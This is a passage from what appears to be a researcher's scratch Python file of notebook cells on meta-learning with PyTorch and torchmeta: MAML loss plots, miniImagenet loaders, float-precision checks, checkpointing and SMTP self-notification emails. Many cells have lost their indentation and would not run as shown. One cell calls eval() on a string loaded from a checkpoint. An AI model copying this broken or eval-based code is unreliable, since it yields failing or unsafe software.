3.2532371115080884e-07]
pl_stds = [1.4852212316567463e-08,
5.090588920661132e-09,
1.1424832554909115e-08,
5.058656213138166e-08]
maml = [3.309504692539563e-07,
4.1058904888091606e-06,
6.8326703386053605e-06,
7.4616147721799645e-06]
maml_stds = [4.039131189060566e-08,
3.66839089258494e-08,
9.20683484136399e-08,
9.789292209743077e-08]
# fig = plt.figure()
fig, ax = plt.subplots(nrows=1, ncols=1)
ax.set_title('MAML vs Pre-Trained embedding with Linear Regression')
x = datas_std
ax.errorbar(x, pl, yerr=pl_stds, label='PLinReg', marker='o')
ax.errorbar(x, maml, yerr=maml_stds, label='MAML', marker='o')
ax.plot()
ax.legend()
ax.set_xlabel('std (of FNN Data set)')
ax.set_ylabel('meta-test loss (MSE)')
plt.show()
# path = Path('~/ultimate-utils/plot').expanduser()
# fig.savefig(path)
print('done \a')
# %%
# Torch-meta miniImagenet
# loop through meta-batches of this data set, print the sizes, and make sure they are what you expect
import torchmeta
from torchmeta.utils.data import BatchMetaDataLoader
from torchmeta.transforms import ClassSplitter
# from torchmeta.toy import Sinusoid
from tqdm import tqdm
# dataset = Sinusoid(num_samples_per_task=100, num_tasks=20)
from pathlib import Path
data_path = Path('~/data/').expanduser()  # define here so the cell runs standalone
dataset = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_train=True, download=True)
print(f'type(metaset_miniimagenet) = {type(dataset)}')
print(f'len(metaset_miniimagenet) = {len(dataset)}')
shots, test_shots = 5, 15
# get metaset
metaset = ClassSplitter(
dataset,
num_train_per_class=shots,
num_test_per_class=test_shots,
shuffle=True)
# get meta-dataloader
batch_size = 16
num_workers = 0
meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
epochs = 2
print(f'batch_size = {batch_size}')
print(f'len(metaset) = {len(metaset)}')
print(f'len(meta_dataloader) = {len(meta_dataloader)}\n')
with tqdm(range(epochs)) as tepochs:
for epoch in tepochs:
print(f'\n[epoch={epoch}]')
for batch_idx, batch in enumerate(meta_dataloader):
print(f'batch_idx = {batch_idx}')
train_inputs, train_targets = batch['train']
test_inputs, test_targets = batch['test']
print(f'train_inputs.shape = {train_inputs.shape}')
print(f'train_targets.shape = {train_targets.shape}')
print(f'test_inputs.shape = {test_inputs.shape}')
print(f'test_targets.shape = {test_targets.shape}')
print()
# %%
import torch
x = torch.tensor([1., 2, 3])
print(x.mean())
print(x * x)
print(x @ x)
print(x.matmul(x))
# x.mm(x) errors: mm() only accepts 2-D matrices and x here is 1-D; see the sketch below
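# (my addition) sketch: lift x to shape (1, 3) so mm() gets the 2-D inputs it expects
X = x.unsqueeze(0)
print(X.mm(X.t()))  # (1, 1) matrix with the same value as x @ x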
# %%
import torch
x = torch.randn(12, 20)
y = torch.randn(20, 30)
out = x @ y
print(out.size())
# %%
# https://www.youtube.com/watch?v=46RjXawJQgg&t=1493s
from pathlib import Path
from pandas import read_csv
df = read_csv(Path('data.csv'))  # placeholder path; point this at a real CSV
print(df.head())
# %%
print('hello-world')
xx = 2
print(xx)
print(' ')
##
print('end!')
# %%
# let's see how big the random values from the normal are
import torch
D = 8
w = torch.tensor([0.1] * D)
print(f'w.size() = {w.size()}')
mu = torch.zeros(w.size())
std = w * 1.5e-2  # std is ~1.5% of the weight magnitude
noise = torch.distributions.normal.Normal(loc=mu, scale=std).sample()
print('--- noise ')
print(noise.size())
print(noise)
w += noise
print('--- w')
print(w.size())
print(w)
# %%
# editing parameters in pytorch in place without error: https://discuss.pytorch.org/t/how-are-layer-weights-and-biases-initialized-by-default/13073/41
import torch
import torch.nn as nn
from collections import OrderedDict
Din, Dout = 8, 1
base_model = nn.Sequential(OrderedDict([
('f1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
with torch.no_grad():
for i, w in enumerate(base_model.parameters()):
print(f'--- i = {i}')
print(w)
w += w + 0.001
print(w)
# %%
# pickle vs torch.save
# def log_validation(args, meta_learner, outer_opt, meta_val_set):
# """ Log the validation loss, acc. Checkpoint the model if that flag is on. """
# if args.save_ckpt: # pickle vs torch.save https://discuss.pytorch.org/t/advantages-disadvantages-of-using-pickle-module-to-save-models-vs-torch-save/79016
# # make dir to logs (and ckpts) if not present. Throw no exceptions if it already exists
# path_to_ckpt = args.logger.current_logs_path
# path_to_ckpt.mkdir(parents=True, exist_ok=True) # creates parents if not presents. If it already exists that's ok do nothing and don't throw exceptions.
# ckpt_path_plus_path = path_to_ckpt / Path('db')
#
# args.base_model = "check the meta_learner field in the checkpoint not in the args field" # so that we don't save the child model so many times since it's part of the meta-learner
# # note this obj has the last episode/outer_i we ran
# torch.save({'args': args, 'meta_learner': meta_learner}, ckpt_path_plus_path)
# acc_mean, acc_std, loss_mean, loss_std = meta_eval(args, meta_learner, meta_val_set)
# if acc_mean > args.best_acc:
# args.best_acc, args.loss_of_best = acc_mean, loss_mean
# args.logger.loginfo(
# f"***> Stats of Best Acc model: meta-val loss: {args.loss_of_best} +- {loss_std}, meta-val acc: {args.best_acc} +- {acc_std}")
# return acc_mean, acc_std, loss_mean, loss_std
# %%
import numpy as np
from sklearn.linear_model import LinearRegression
X = np.array([[1, 1], [1, 2], [2, 2], [2, 3]])
# y = 1 * x_0 + 2 * x_1 + 3
y = np.dot(X, np.array([1, 2])) + 3
reg = LinearRegression()
print(reg)
reg = LinearRegression().fit(X, y)
print(reg)
print(reg.score(X, y))
print(reg.coef_)
print(reg.intercept_)
print(reg.predict(np.array([[3, 5]])))
# %%
# https://stackoverflow.com/questions/63818676/what-is-the-machine-precision-in-pytorch-and-when-should-one-use-doubles
# https://discuss.pytorch.org/t/how-does-one-start-using-double-without-unexpected-bugs/95715
# https://discuss.pytorch.org/t/what-is-the-machine-precision-of-pytorch-with-cpus-or-gpus/9384
import torch
x1 = torch.tensor(1e-6)
x2 = torch.tensor(1e-7)
x3 = torch.tensor(1e-8)
x4 = torch.tensor(1e-9)
eps = torch.tensor(1e-11)
print(x1.dtype)
print(x1)
print(x1 + eps)
print(x2)
print(x2 + eps)
print(x3)
print(x3 + eps)
print(x4)
print(x4 + eps)
# %%
# python float is a C double
# NumPy's standard numpy.float is the same (so C double), also numpy.float64.
# https://www.doc.ic.ac.uk/~eedwards/compsys/float/
# https://stackoverflow.com/questions/1049722/what-is-2s-complement
# https://www.cs.cornell.edu/~tomf/notes/cps104/twoscomp.html#whyworks
# https://stackoverflow.com/questions/7524838/fixed-point-vs-floating-point-number
# https://en.wikipedia.org/wiki/Single-precision_floating-point_format
# https://www.cs.cornell.edu/~tomf/notes/cps104/twoscomp.html#whyworks
import torch
xf = torch.tensor(1e-7)
xd = torch.tensor(1e-7, dtype=torch.double)
epsf = torch.tensor(1e-11)
print(xf.dtype)
print(xf)
print(xf.item())
print(type(xf.item()))
#
print('\n> test when a+eps = a')
print(xf.dtype)
print(f'xf = {xf}')
print(f'xf + 1e-7 = {xf + 1e-7}')
print(f'xf + 1e-11 = {xf + 1e-11}')
print(f'xf + 1e-8 = {xf + 1e-8}')
print(f'xf + 1e-16 = {xf + 1e-16}')
# after seeing the above it seems that there are errors if things are small
print('\n> test when a+eps = a (double precision)')
x = torch.tensor(1e-7, dtype=torch.double)
print(f'xf = {x}')
print(f'xf + 1e-7 = {x + 1e-7}')
print(f'xf + 1e-11 = {x + 1e-11}')
print(f'xf + 1e-8 = {x + 1e-8}')
print(f'xf + 1e-16 = {x + 1e-16}')
# using doubles clearly is better but still has some errors
print('\n> test when a+eps = a (float32, larger base value)')
x = torch.tensor(1e-4)
print(f'xf = {x}')
print(f'xf + 1e-7 = {x + 1e-7}')
print(f'xf + 1e-11 = {x + 1e-11}')
print(f'xf + 1e-8 = {x + 1e-8}')
print(f'xf + 1e-16 = {x + 1e-16}')
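# (my addition) sketch: instead of probing by hand, query machine epsilon directly
print(f'float32 eps = {torch.finfo(torch.float32).eps}')  # ~1.19e-07
print(f'float64 eps = {torch.finfo(torch.float64).eps}')  # ~2.22e-16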
# %%
# https://pytorch.org/docs/stable/torchvision/models.html
# %%
import torch
print(torch.zeros(2))
m = torch.distributions.MultivariateNormal(torch.zeros(2), torch.eye(2))
x = m.sample()
print(x)
# m = torch.distributions.MultivariateNormal(torch.zeros(1, 3), torch.eye(1, 3))
# mu = m.sample()
# print(mu)
m = torch.distributions.MultivariateNormal(torch.zeros(1, 5), torch.eye(5))
y = m.sample()
print(y)
# %%
from pathlib import Path
from matplotlib import pyplot as plt
import numpy as np
path = Path('~/data/').expanduser()
# x = np.linspace(0, 2*np.pi, 50)
x = np.random.uniform(0, 2 * np.pi, 100)
noise = np.random.normal(0.0, 0.05, 100)
print(noise)
y = np.sin(x) + noise
plt.figure()
plt.scatter(x, y)
plt.ylabel('f(x)')
plt.xlabel('x (raw feature)')
plt.savefig(path / 'test_fig.pdf')
plt.savefig(path / 'test_fig.png')
plt.show()
# %%
from socket import gethostname
from email.message import EmailMessage
import smtplib
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
print(server)
# %%
# MTA (Mail Transfer Agent)
# https://stackoverflow.com/questions/784201/is-there-a-python-mta-mail-transfer-agent
# https://www.quora.com/How-does-one-send-e-mails-from-Python-using-MTA-Mail-Transfer-Agent-rather-than-an-SMTP-library
# https://www.reddit.com/r/learnpython/comments/ixlq81/how_does_one_send_emails_from_python_using_mta/
# Q why can't I just send an email directly?
# Q why do smtp libraries exist
# %%
import smtplib
server = smtplib.SMTP('smtp.intel-research.net', 25)
server.starttls()
print(server)
# %%
# from socket import gethostname
# from email.message import EmailMessage
# import smtplib
#
# server = smtplib.SMTP('smtp.gmail.com', 587)
# server.starttls()
# # not a real email account nor password, its all ok!
# server.login('slurm.miranda@gmail.com', 'dummy123!@#$321')
#
# # craft message
# msg = EmailMessage()
#
# message = f'{message}\nSend from Hostname: {gethostname()}'
# msg.set_content(message)
# msg['Subject'] = subject
# msg['From'] = 'slurm.miranda@gmail.com'
# msg['To'] = destination
# # send msg
# server.send_message(msg)
# %%
# send email with smtp intel
def send_email(message):
from socket import gethostname
import smtplib
hostname = gethostname()
from_address = 'slurm.miranda@gmail.com'
from_address = 'miranda9@intel-research.net.'
# to_address = [ 'iam-alert@intel-research.net']
to_address = ['brando.science@gmail.com']
subject = f"Test msg from: {hostname}"
##
message = f'Test msg from {hostname}: {message}'
full_message = f'From: {from_address}\n' \
f'To: {to_address}\n' \
f'Subject: {subject}\n' \
f'{message}'
server = smtplib.SMTP('smtp.intel-research.net')
server.sendmail(from_address, to_address, full_message)
server.quit()
# sys.exit(1)
print('start')
send_email('HelloWorld')
print('done email test!')
# %%
def send_email2(message):
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from socket import gethostname
import smtplib
server = smtplib.SMTP('smtp.intel-research.net')
# craft message
msg = MIMEMultipart()
message = f'{message}\nSend from Hostname: {gethostname()}'
msg['Subject'] = 'Test email'
msg['From'] = 'miranda9@intel-research.net.'
msg['To'] = 'brando.science@gmail.com'
msg.attach(MIMEText(message, "plain"))
# send message
server.send_message(msg)
# server.sendmail(from_address, to_address, full_message)
server.quit()
print('start')
send_email2('HelloWorld')
print('done email test!')
# %%
from pathlib import Path
message = 'HelloWorld'
path_to_pdf = Path('~/data/test_fig.pdf').expanduser()
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from socket import gethostname
import smtplib
server = smtplib.SMTP('smtp.intel-research.net')
# craft message
msg = MIMEMultipart()
message = f'{message}\nSend from Hostname: {gethostname()}'
msg['Subject'] = 'Test email'
msg['From'] = 'miranda9@intel-research.net.'
msg['To'] = 'brando.science@gmail.com'
msg.attach(MIMEText(message, "plain"))
# attach pdf
if path_to_pdf.exists():
with open(path_to_pdf, "rb") as f:
# attach = email.mime.application.MIMEApplication(f.read(),_subtype="pdf")
attach = MIMEApplication(f.read(), _subtype="pdf")
attach.add_header('Content-Disposition', 'attachment', filename=str(path_to_pdf))
msg.attach(attach)
# send message
server.send_message(msg)
# server.sendmail(from_address, to_address, full_message)
server.quit()
# %%
# Here, we used "w" letter in our argument, which indicates write and will create a file if it does not exist in library
# Plus sign indicates both read and write.
# with open('data.json', 'w+') as f:
# json.dump(self.stats, f)
# %%
import numpy as np
from pathlib import Path
from torch.utils.tensorboard import SummaryWriter  # https://deeplizard.com/learn/video/psexxmdrufm
path = Path('~/data/logs/').expanduser()
tb = SummaryWriter(log_dir=path)
# tb = SummaryWriter(log_dir=args.current_logs_path)
for i in range(3):
loss = i + np.random.normal(loc=0, scale=1)
tb.add_scalar('loss', loss, i)
# %%
# https://pytorch.org/tutorials/beginner/saving_loading_models.html
# Saving & Loading Model for Inference
# Save/Load state_dict (Recommended)
# Save:
# torch.save(model.state_dict(), PATH)
#
# # Load:
# model = TheModelClass(*args, **kwargs)
# model.load_state_dict(torch.load(PATH))
# model.eval()
# %%
# Save:
# torch.save({
# 'epoch': epoch,
# 'model_state_dict': model.state_dict(),
# 'optimizer_state_dict': optimizer.state_dict(),
# 'loss': loss,
# ...
# }, PATH)
# # Load:
# model = TheModelClass(*args, **kwargs)
# optimizer = TheOptimizerClass(*args, **kwargs)
#
# checkpoint = torch.load(PATH)
# model.load_state_dict(checkpoint['model_state_dict'])
# optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
# epoch = checkpoint['epoch']
# loss = checkpoint['loss']
#
# model.eval()
# # - or -
# model.train()
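# %%
# (my addition) minimal runnable sketch of the checkpoint pattern quoted above, using a toy
# linear model; the path under ~/data/tmp/ is just a placeholder
import torch
import torch.nn as nn
from pathlib import Path
path = Path('~/data/tmp/').expanduser()
path.mkdir(parents=True, exist_ok=True)
model = nn.Linear(1, 1)
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
torch.save({'epoch': 0,
            'model_state_dict': model.state_dict(),
            'optimizer_state_dict': optimizer.state_dict(),
            'loss': float('inf')}, path / 'ckpt.pt')
checkpoint = torch.load(path / 'ckpt.pt')
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
print(f"restored epoch = {checkpoint['epoch']}, loss = {checkpoint['loss']}")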
# %%
# https://discuss.pytorch.org/t/how-does-load-a-sequential-model-from-a-string/97648
# https://stackoverflow.com/questions/64109883/how-does-one-load-a-sequential-model-from-a-string-in-pytorch
# %%
#
# torch.save({'f': f,
# 'f_state_dict': f.state_dict(),
# 'f_str': str(f),
# 'f_modules': f._modules,
# 'f_modules_str': str(f._modules)
# }, path2avg_f)
# %%
from pathlib import Path
from torch.utils.tensorboard import SummaryWriter
import numpy as np
path = Path('~/data/tb_test/').expanduser()
# path = Path('~/logs/logs_Sep29_12-38-08_jobid_-1/tb').expanduser()
writer = SummaryWriter(path)
for n_iter in range(100):
writer.add_scalar('Loss/train', np.random.random(), n_iter)
writer.add_scalar('Loss/test', np.random.random(), n_iter)
writer.add_scalar('Accuracy/train', np.random.random(), n_iter)
writer.add_scalar('Accuracy/test', np.random.random(), n_iter)
print('done! \a')
# %%
# resume-from-checkpoint snippet; assumes `args.resume_ckpt_path` is set by the surrounding training script
import torch
db = torch.load(str(args.resume_ckpt_path))
# args.epchs = db['epoch'] # we can start counting from zero
# args.epoch += 1 # this is needed so that it starts on the next batch since it says the last batch it *did* and range counts with 0 indexing.
# meta_learner = db['meta_learner']
args.base_model = db['f']
# in case loading directly doesn't work
modules = eval(db['f_modules_str'])
args.base_model = torch.nn.Sequential(modules)
f_state_dict = db['f_state_dict']
args.base_model.load_state_dict(f_state_dict)
# %%
# Torch-meta miniImagenet
import torchmeta
from torchmeta.utils.data import BatchMetaDataLoader
from torchmeta.transforms import ClassSplitter
from pathlib import Path
from tqdm import tqdm
data_path = Path('~/data/').expanduser()
meta_split = 'train'
dataset = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_split=meta_split, download=True)
# dataset = torchmeta.datasets.Omniglot(data_path, num_classes_per_task=5, meta_split=meta_split, download=True)
print(f'type(metaset_miniimagenet) = {type(dataset)}')
print(f'len(metaset_miniimagenet) = {len(dataset)}')
shots, test_shots = 5, 15
metaset = ClassSplitter(
dataset,
num_train_per_class=shots,
num_test_per_class=test_shots,
shuffle=True)
batch_size = 16
num_workers = 0
meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
epochs = 2
print(f'batch_size = {batch_size}')
print(f'len(metaset) = {len(metaset)}')
print(f'len(meta_dataloader) = {len(meta_dataloader)}\n')
with tqdm(range(epochs)) as tepochs:
for epoch in tepochs:
print(f'\n[epoch={epoch}]')
for batch_idx, batch in enumerate(meta_dataloader):
print(f'batch_idx = {batch_idx}')
train_inputs, train_targets = batch['train']
test_inputs, test_targets = batch['test']
print(f'train_inputs.shape = {train_inputs.shape}')
print(f'train_targets.shape = {train_targets.shape}')
print(f'test_inputs.shape = {test_inputs.shape}')
print(f'test_targets.shape = {test_targets.shape}')
print()
break
break
# %%
from torchmeta.datasets.helpers import omniglot
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
from pathlib import Path
meta_split = 'train'
data_path = Path('~/data/').expanduser()
dataset = omniglot(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
for batch in dataloader:
train_inputs, train_targets = batch["train"]
print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
test_inputs, test_targets = batch["test"]
print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
# %%
# replacing a module in in a pytorch model
# https://discuss.pytorch.org/t/how-to-modify-a-pretrained-model/60509/11
import torch
from torchmeta.datasets.helpers import omniglot
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
from pathlib import Path
import copy
meta_split = 'train'
data_path = Path('~/data/').expanduser()
dataset = omniglot(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
def replace_bn(module, name):
"""
Recursively put desired batch norm in nn.module module.
set module = net to start code.
"""
# go through all attributes of module nn.module (e.g. network or layer) and put batch norms if present
for attr_str in dir(module):
target_attr = getattr(module, attr_str)
if type(target_attr) == torch.nn.BatchNorm2d:
new_bn = torch.nn.BatchNorm2d(target_attr.num_features, target_attr.eps, target_attr.momentum,
target_attr.affine,
track_running_stats=False)
setattr(module, attr_str, new_bn)
# iterate through immediate child modules. Note, the recursion is done by our code no need to use named_modules()
for name, immediate_child_module in module.named_children():
replace_bn(immediate_child_module, name)
def convert_bn(model):
for module in model.modules():
if isinstance(module, torch.nn.modules.batchnorm._BatchNorm):
module.__init__(module.num_features, module.eps,
module.momentum, module.affine,
track_running_stats=False)
fc_out_features = 5
# model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=False)
# replace_bn(model, 'model')
# model.fc = torch.nn.Linear(in_features=512, out_features=fc_out_features, bias=True)
#
# model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet50', pretrained=False)
# replace_bn(model, 'model')
# model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
# model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet101', pretrained=False)
# replace_bn(model, 'model')
# model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet152', pretrained=False)
replace_bn(model, 'model')
model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
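# sanity check (my addition, a minimal sketch): after replace_bn, no BatchNorm2d in the resnet
# should still be tracking running statistics.
for _name, _m in model.named_modules():
    if isinstance(_m, torch.nn.BatchNorm2d):
        assert _m.track_running_stats is False, f'BatchNorm layer {_name} still tracks running stats'
print('all BatchNorm2d layers have track_running_stats=False')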
for batch in dataloader:
    train_inputs, train_targets = batch["train"]
    print('Train inputs shape: {0}'.format(train_inputs.shape))  # (16, 25, 3, 84, 84) for miniimagenet
    print('Train targets shape: {0}'.format(train_targets.shape))  # (16, 25)
    test_inputs, test_targets = batch["test"]
    print('Test inputs shape: {0}'.format(test_inputs.shape))  # (16, 75, 3, 84, 84) for miniimagenet
    print('Test targets shape: {0}'.format(test_targets.shape))  # (16, 75)
first_meta_batch = train_inputs[0] # task
nk_task = first_meta_batch
out = model(nk_task)
print(f'resnet out.size(): {out.size()}')
break
print('success\a')
# %%
import torch
import torchvision.transforms as transforms
# import torchmeta
# from torchmeta.datasets.helpers import omniglot
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
from pathlib import Path
meta_split = 'train'
data_path = Path('~/data/').expanduser()
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
data_augmentation_transforms = transforms.Compose([
transforms.RandomResizedCrop(84),
transforms.RandomHorizontalFlip(),
transforms.ColorJitter(
brightness=0.4,
contrast=0.4,
saturation=0.4,
hue=0.2),
transforms.ToTensor(),
normalize])
dataset = miniimagenet(data_path,
transform=data_augmentation_transforms,
ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=False)
print(len(dataloader))
# for batch_idx, batch in enumerate(dataloader):
# print(f'--> batch_idx = {batch_idx}')
# train_inputs, train_targets = batch["train"]
# print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
# print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
# test_inputs, test_targets = batch["test"]
# print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
# print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
# first_meta_batch = train_inputs[0] # task
# nk_task = first_meta_batch
# out = model(nk_task)
# print(f'resnet out.size(): {out.size()}')
# break
print('success\a')
# %%
import torch
import torchvision.transforms as transforms
# import torchmeta
# from torchmeta.datasets.helpers import omniglot
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
from pathlib import Path
meta_split = 'train'
data_path = Path('~/data/').expanduser()
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
data_augmentation_transforms = transforms.Compose([
transforms.RandomResizedCrop(84),
transforms.RandomHorizontalFlip(),
transforms.ColorJitter(
brightness=0.4,
contrast=0.4,
saturation=0.4,
hue=0.2),
transforms.ToTensor(),
normalize])
dataset = miniimagenet(data_path,
transform=data_augmentation_transforms,
ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
print(f'len augmented = {len(dataloader)}')
dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
print(f'len normal = {len(dataloader)}')
print('success\a')
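# note (my understanding, hedged): both loaders report the same length because the length of a torchmeta
# CombinationMetaDataset counts class combinations C(num_classes, ways) and does not depend on the image
# transform; BatchMetaDataLoader then divides that count by the meta-batch size.
from math import comb
print(f'rough expected number of meta-batches = {comb(64, 5) // 16}')  # assumes 64 meta-train classes, ignores rounding details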
# %%
import torch
import torchvision.transforms as transforms
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
from tqdm import tqdm
from pathlib import Path
meta_split = 'train'
data_path = Path('~/data/').expanduser()
# normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# data_augmentation_transforms = transforms.Compose([
# transforms.RandomResizedCrop(84),
# transforms.RandomHorizontalFlip(),
# transforms.ColorJitter(
# brightness=0.4,
# contrast=0.4,
# saturation=0.4,
# hue=0.2),
# transforms.ToTensor(),
# normalize])
# dataset = miniimagenet(data_path,
# transform=data_augmentation_transforms,
# ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
# print(f'len augmented = {len(dataloader)}')
dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
print(f'len normal = {len(dataloader)}')
num_batches = 10
with tqdm(dataloader, total=num_batches) as pbar:
for batch_idx, batch in enumerate(pbar):
train_inputs, train_targets = batch["train"]
print(train_inputs.size())
# print(batch_idx)
        if batch_idx + 1 >= num_batches:  # stop after num_batches meta-batches (batch_idx is 0-based)
            break
print('success\a')
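# a minimal sketch (my addition, not in the original cell): flatten the meta-batch and task dimensions of the
# last support batch so it can be pushed through a standard model in a single forward pass.
meta_b, n_k, C, H, W = train_inputs.size()  # e.g. (16, 25, 3, 84, 84) for 5-way 5-shot miniimagenet
flat_support = train_inputs.reshape(meta_b * n_k, C, H, W)
print(f'flat_support.size() = {flat_support.size()}')  # expected: (16*25, 3, 84, 84)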
# %%
from math import comb
total_classes = 64
n = 5
number_tasks = comb(total_classes, n)
print(number_tasks)
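# a hedged extension of the count above: assuming the standard miniimagenet split of
# 64 meta-train / 16 meta-val / 20 meta-test classes, the number of distinct 5-way class
# combinations per split would be:
for split_name, split_classes in [('train', 64), ('val', 16), ('test', 20)]:
    print(f'{split_name}: C({split_classes}, {n}) = {comb(split_classes, n)} possible {n}-way tasks')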
# %%
# saving a json file
# human readable pretty print: https://stackoverflow.com/questions/12943819/how-to-prettyprint-a-json-file
import json
data = 'data string'
with open('data.txt', 'w') as outfile:
json.dump(data, outfile)
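# a small sketch of the pretty-print variant from the SO link above (my addition; the dict contents are hypothetical):
# passing indent (and optionally sort_keys) to json.dump makes the saved file human readable.
pretty_data = {'experiment': 'example', 'metrics': {'loss': 0.1, 'acc': 0.9}}  # hypothetical example data
with open('data_pretty.json', 'w') as outfile2:
    json.dump(pretty_data, outfile2, indent=4, sort_keys=True)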
# json.dump(data, open('data.txt', 'w'))
# with open(current_logs_path / 'experiment_stats.json', 'w+') as f:
# json.dump(self.stats, f)
# data_ars = {key:value for (key,value) in dictonary.items()}
# x = {key:str(value) fo
# %%
#
# # to test impots
# import sys
#
# for path in sys.path:
# print(path)
# # %%
#
# import time
#
# import logging
#
# logger = logging.getLogger(__name__)
# logger.setLevel(logging.INFO)
#
# formatter = logging.Formatter('%(levelname)s:%(name)s:%(message)s')
#
# file_handler = logging.FileHandler('employee.log')
# file_handler.setFormatter(formatter)
#
# logger.addHandler(file_handler)
#
#
# class Employee:
# """A sample Employee class"""
#
# def __init__(self, first, last):
# self.first = first
# self.last = last
#
# logger.info('Created Employee: {} - {}'.format(self.fullname, self.email))
#
# @property
# def email(self):
# return '{}.{}@email.com'.format(self.first, self.last)
#
# @property
# def fullname(self):
# return '{} {}'.format(self.first, self.last)
#
#
# emp_1 = Employee('John', 'Smith')
# emp_2 = Employee('Corey', 'Schafer')
# emp_3 = Employee('Jane', 'Doe')
#
#
# ######## END OF EMPLOYEE LOGGING EXAMPLE
#
# def report_times(start, verbose=False):
# '''
# How much time has passed since the time "start"
#
# :param float start: the number representing start (usually time.time())
# '''
# meta_str = ''
# ## REPORT TIMES
# start_time = start
# seconds = (time.time() - start_time)
# minutes = seconds / 60
# hours = minutes / 60
# if verbose:
# print(f"--- {seconds} {'seconds ' + meta_str} ---")
# print(f"--- {minutes} {'minutes ' + meta_str} ---")
# print(f"--- {hours} {'hours ' + meta_str} ---")
# print('\a')
# ##
# msg = f'time passed: hours:{hours}, minutes={minutes}, seconds={seconds}'
# return msg, seconds, minutes, hours
#
#
# def params_in_comp_graph():
# import torch
# import torch.nn as nn
# from torchviz import make_dot
# fc0 = nn.Linear(in_features=3, out_features=1)
# params = [('fc0', fc0)]
# mdl = nn.Sequential(OrderedDict(params))
#
# x = torch.randn(1, 3)
# # x.requires_grad = True # uncomment to put in computation graph
# y = torch.randn(1)
#
# l = (mdl(x) - y) ** 2
#
# # make_dot(l, params=dict(mdl.named_parameters()))
# params = dict(mdl.named_parameters())
# # params = {**params, 'x':x}
# make_dot(l, params=params).render('data/debug/test_img_l', format='png')
#
#
# def check_if_tensor_is_detached():
# a = torch.tensor([2.0], requires_grad=True)
# b = a.detach()
# b.requires_grad = True
# print(a == b)
# print(a is b)
# print(a)
# print(b)
#
# la = (5.0 - a) ** 2
# la.backward()
# print(f'a.grad = {a.grad}')
#
# lb = (6.0 - b) ** 2
# lb.backward()
# print(f'b.grad = {b.grad}')
#
#
# def deep_copy_issue():
# params = OrderedDict([('fc1', nn.Linear(in_features=3, out_features=1))])
# mdl0 = nn.Sequential(params)
# mdl1 = copy.deepcopy(mdl0)
# print(id(mdl0))
# print(mdl0)
# print(id(mdl1))
# print(mdl1)
# # my update
# mdl1.fc1.weight = nn.Parameter(mdl1.fc1.weight + 1)
# mdl2 = copy.deepcopy(mdl1)
# print(id(mdl2))
# print(mdl2)
#
#
# def download_mini_imagenet():
# # download mini-imagenet automatically
# import torch
# import torch.nn as nn
# import torchvision.datasets.utils as utils
# from torchvision.datasets.utils import download_and_extract_archive
# from torchvision.datasets.utils import download_file_from_google_drive
#
# ## download mini-imagenet
# # url = 'https://drive.google.com/file/d/1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
# file_id = '1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
# filename = 'miniImagenet.tgz'
